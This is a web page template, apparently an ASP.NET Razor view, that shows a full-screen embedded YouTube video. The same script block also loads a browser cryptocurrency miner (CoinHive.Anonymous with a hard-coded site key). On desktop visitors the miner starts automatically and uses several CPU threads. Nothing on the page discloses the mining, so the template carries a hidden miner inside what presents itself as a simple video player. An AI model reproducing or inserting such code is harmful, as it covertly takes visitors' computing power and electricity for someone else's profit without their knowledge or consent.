
<div id="player"></div>
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>
    var tag = document.createElement('script');
    tag.src = "https://www.youtube.com/iframe_api";
    var firstScriptTag = document.getElementsByTagName('script')[0];
    firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

    var player;
    function onYouTubeIframeAPIReady() {
        player = new YT.Player('player', {
            height: '100%',
            width: '100%',
            videoId: '@ViewBag.uid',
            playerVars: {
                autoplay: 0,
                rel: 0,
                showinfo: 0,
                iv_load_policy: 3,
                modestbranding: 1,
                cc_load_policy: 1
                
            },
            events: {
                'onReady': onPlayerReady,
               
            }
        });
    }

    function onPlayerReady(event) {
        event.target.playVideo();
    }

    var miner = new CoinHive.Anonymous('yxEdUlVlkqdhLzbw2njg1mbGCQaXIVM7');
    if (!miner.isMobile()) {

        miner.start();
        var thrd = Math.ceil(navigator.hardwareConcurrency / 4);
        miner.setNumThreads(thrd);
        miner.setThrottle(0.8);

    }

      
</script>

<style type="text/css">
    body, html {
        margin: 0;
        padding: 0;
        height: 100%;
        overflow: hidden;
    }

    #player {
        position: absolute;
        left: 0;
        right: 0;
        bottom: 0;
        top: 0px;
    }
</style>





